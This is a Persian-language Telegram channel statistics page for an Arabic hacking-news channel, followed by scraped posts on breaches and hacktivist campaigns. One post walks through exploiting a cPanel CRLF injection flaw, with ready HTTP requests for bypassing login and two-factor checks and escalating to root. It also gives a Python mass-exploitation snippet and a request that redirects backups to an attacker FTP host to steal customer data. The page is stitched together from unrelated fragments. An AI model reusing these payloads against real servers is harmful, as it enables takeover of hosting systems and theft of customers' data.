Hacker News
المصدر العربي الأول لأخبار الهاكرز و ملتقى الأحرار و المناضلين صفحتنا الأولى https://www.facebook.com/HackerNews2
نمایش بیشتر📈 تحلیل کانال تلگرام Hacker News
کانال Hacker News (@hackernewsar) در بخش زبانی عربی بازیگری فعال است. در حال حاضر جامعه شامل 13 273 مشترک است و جایگاه 9 644 را در دسته فناوری و برنامهها و رتبه 5 786 را در منطقه المملكة العربية السعودية دارد.
📊 شاخصهای مخاطب و پویایی
از زمان ایجاد در невідомо، پروژه رشد سریعی داشته و 13 273 مشترک جذب کرده است.
بر اساس آخرین دادهها در تاریخ 15 ژوئن, 2026، کانال فعالیت پایداری دارد. در ۳۰ روز گذشته تغییر اعضا برابر -15 و در ۲۴ ساعت گذشته برابر 2 بوده و همچنان دسترسی گستردهای حفظ شده است.
- وضعیت تأیید: تأیید نشده
- نرخ تعامل (ER): میانگین تعامل مخاطب 15.31% است و در ۲۴ ساعت نخست پس از انتشار، محتوا معمولاً 5.70% واکنش نسبت به کل مشترکان کسب میکند.
- دسترسی پستها: هر پست به طور میانگین 2 032 بازدید دریافت میکند. در اولین روز معمولاً 756 بازدید جمعآوری میشود.
- واکنشها و تعامل: مخاطبان بهطور فعال حمایت میکنند؛ میانگین واکنش به هر پست 28 است.
- علایق موضوعی: محتوا بر موضوعات کلیدی مانند نِظَام, شَرِكَة, اِختِرَاق, مَجمُوعَة, بَيَان تمرکز دارد.
📝 توضیح و سیاست محتوایی
نویسنده این فضا را محل بیان دیدگاههای شخصی توصیف میکند:
“المصدر العربي الأول لأخبار الهاكرز و ملتقى الأحرار و المناضلين
صفحتنا الأولى https://www.facebook.com/HackerNews2”
به لطف بهروزرسانیهای پرتکرار (آخرین داده در تاریخ 16 ژوئن, 2026)، کانال همواره بهروز و دارای دسترسی بالاست. تحلیلها نشان میدهد مخاطبان بهطور فعال با محتوا تعامل دارند و آن را به نقطه اثرگذاری مهم در دسته فناوری و برنامهها تبدیل کردهاند.
الهدف من هذه العمليات، حسب بيان المجموعة، هو الرد على تعاون الإمارات مع الكيان الصهيوني والولايات المتحدة، والأعمال القذرة التي تقف وراءها حكومة الإمارات.#HackerNews #Handala
GET /login/?user=admin%0D%0Aauthenticated=1%0D%0Auser=root%0D%0A HTTP/1.1 Host: your-cpanel-server.comشرح ما یحدث خلف الكوالیس: .1 الحقن: عند استقبال السیرفر لھذا الطلب، یقوم بمعالجة حقل user . .2 التلاعب بالملف: بسبب وجود %0D%0A (أصل الثغرة)، یظن نظام إنشاء الجلسات أن ھذه الأسطر ھي "خصائص" جدیدة للجلسة. .3 تزییف الصلاحیات: بدلاً من كتابة سطر واحد یحتوي على اسم المستخدم، یكتب السیرفر في ملف الجلسة الداخلي: -user: admin 1 -2 1 :authenticated تمت المصادقة -3 user: root تغییر ھویة المستخدم إلى الجذر -4 النتیجة: عندما یعود النظام لقراءة ملف الجلسة لیرى ھل ھذا المستخدم مسموح لھ بالدخول، یجد أن قیمة authenticated ھي 1 (نعم)، فیسمح بالدخول فوراً بصلاحیات root . سیناریوھات لاستغلال الثغرة : 1. تجاوز التحقق بخطوتین: ھذا ھو السیناریو الأكثر خطورة. حتى لو كان لدى مدیر السیرفر نظام Authenticator Google أو رسائل SMS، فإن الحقن عبر CRLF یسمح للمھاجم بإضافة سطر 1=tfa_verified أو mfa_passed=true داخل ملف الجلسة. ھذا یجعل النظام "یعتقد" أن المستخدم قد أدخل رمز التحقق بنجاح، مما یسمح للمھاجم بالدخول مباشرة إلى لوحة WHM وتغییر كافة الإعدادات. مثال الطلب:
POST /login/ HTTP/1.1 User-Agent: %0D%0Aauthenticated=1%0D%0Atfa_passed=1%0D%0Auser=admin2. سیناریو "الارتقاء بالصلاحیات" : في ھذا السیناریو، قد یكون لدى المھاجم حساب "موزع" (Reseller) أو حتى حساب استضافة عادي (User). یقوم المھاجم باستخدام الثغرة أثناء عملیة تسجیل الدخول لحساب محدود الصلاحیات، ویقوم بحقن قیم ترفع رتبة جلسته إلى root. ھذا یسمح له بالانتقال من إدارة موقع واحد إلى إدارة السیرفر بالكامل والوصول إلى بیانات جمیع المواقع الأخرى المستضافة. مثال الطلب:
GET /cpsessXXXXX/json-api/cpanel?user=myuser%0D%0Aapp=whm%0D%0Apriv=root3. استھداف واجھة "WP Squared" : بما أن الثغرة تؤثر أیضاً على "WP Squared" المنتج الجدید من cPanel لإدارة وردبرس، یمكن للمھاجمین استھداف السیرفرات التي تشغل ھذه الخدمة للسیطرة على مئات مواقع وردبرس بضغطة واحدة، وزرع برمجیات خبیثة (Malware) أو طلب فدیة (Ransomware) من أصحاب المواقع. مثال الطلب:
GET /wps/api/v1/instances?search=%0D%0Arole=super_admin
4. استغلال "واجھة برمجة التطبیقات" (API Exploitation) :
لا یقتصر الاستغلال على المتصفح فقط، فالمھاجمون یبرمجون "سكربتات" (Bots) تستخدم واجھة API الخاصة بـ cPanel لإرسال طلبات HTTP المفخخة بكمیات ھائلة. ھذا السیناریو یُستخدم لعمل Mass Defacement (تغییر واجھة آلاف المواقع في وقت قیاسي) أو تحویل السیرفرات المصابة إلى جزء من شبكة "بوت نت" لشن ھجمات DDoS.
مثال الطلب:
python
headers = {'User-Agent': 'Mozilla/5.0\r\nauthenticated=1\r\nuser=root'
response = requests.get("https://target.com", headers=headers)
5. سرقة النسخ الاحتیاطیة:
بمجرد الدخول بصلاحیات Root عبر الثغرة، لا یقوم المھاجم دائماً بتخریب الموقع؛ بل یتوجھ مباشرة إلى إعدادات النسخ الاحتیاطي. یقوم بتغییر وجھة النسخ الاحتیاطي ( Amazon S3 أو FTP خارجي) إلى سیرفر یمتلكه ھو، وبذلك یحصل على نسخة كاملة من بیانات العملاء، كلمات المرور، وقواعد البیانات بشكل صامت ودون لفت الانتباه.
مثال الطلب:
POST /json-api/set_backup_config?%0D%0Adestination=ftp://attackerserver .comملاحظة: هذه الأمثلة لأغراض تعليمية ولا يتحمل الناشر أي سوء استخدام للمعلومات المنشورة. #HackerNews #cpanel #CVE_2026_41940
عندما يحاول أي مستخدم تسجيل الدخول، يقوم خادم cPanel (المعروف تقنياً بـ cpsrvd) بإنشاء "ملف جلسة" مؤقت على القرص الصلب لتخزين بيانات المحاولة 💾، وتم اكتشاف أن النظام لا يقوم بتنقية البيانات المدخلة في ترويسات HTTP (مثل Basic Auth) بشكل كافٍ، بسبب خلل في معالجة بيانات الجلسات وحقن بروتوكول CRLF، مما يسمح للمهاجم بالتلاعب بملفات الجلسة 🐛🕸.#HackerNews 📰 #cpanel ⚙️ #CVE_2026_41940 🔞
هذا وتلقى كذلك آلاف المحتلين الصهاينة اليوم رسائل مشابهة على هواتفهم تضمنت تهديدات مباشرة، لتثبت مجموعة حنظلة أن أي جدار أمني يمكن تجاوزه.#HackerNews #Handala
مجموعة ShinyHunters جزء من تحالف أوسع يسمى "The Com"، يضم مجموعات مثل "Scattered Spider" و"Lapsus$" 🕸🕷.#HackerNews #ShinyHunters #Udemy
يوصف نموذج Mythos بأنه أداة فائقة القوة في مجال الأمن السيبراني 🛡، حيث أثبت قدرته في الاختبارات الداخلية على اكتشاف "ثغرات يوم الصفر" لم تكن معروفة في أنظمة التشغيل والمتصفحات الرئيسية في غضون ساعات وهي ثغرات ظلت مخفية لعقود، وكذلك بناء استغلالات مركبة لتجاوز دفاعات معقدة والوصول إلى جذور النظام. ⚡️🔍#HackerNews #Mythos
يعتبر بنك سيتيزنز واحدًا من أكبر 20 بنكًا في الولايات المتحدة 🇺🇸، بإجمالي أصول تقارب 220 مليار دولار 💵، أما بنك فروست تبلغ أصوله حوالي 53 مليار دولار مما يجعله ضمن قائمة أكبر 50 بنكًا أمريكيًا 📊.#HackerNews 🔐 #Everest 🏔
فتح مكتب المدعي العام في باريس تحقيقا حول هذا الاختراق، وتم تفعيل خلية أزمة، وبدأت الوكالة بإخطار المتضررين فرداً فرداً، كما حذرت السلطات من أن هذه البيانات، رغم أنها لا تمنح وصولاً مباشراً للحسابات، إلا أنها "كنز" لعمليات انتحال الشخصية وهجمات التصيد الاحتيالي (Phishing) عالية الدقة 🕵️♂️🎣#HackerNews #breach3d
اکنون در دسترس! پژوهش تلگرام ۲۰۲۵ — مهمترین بینشهای سال 
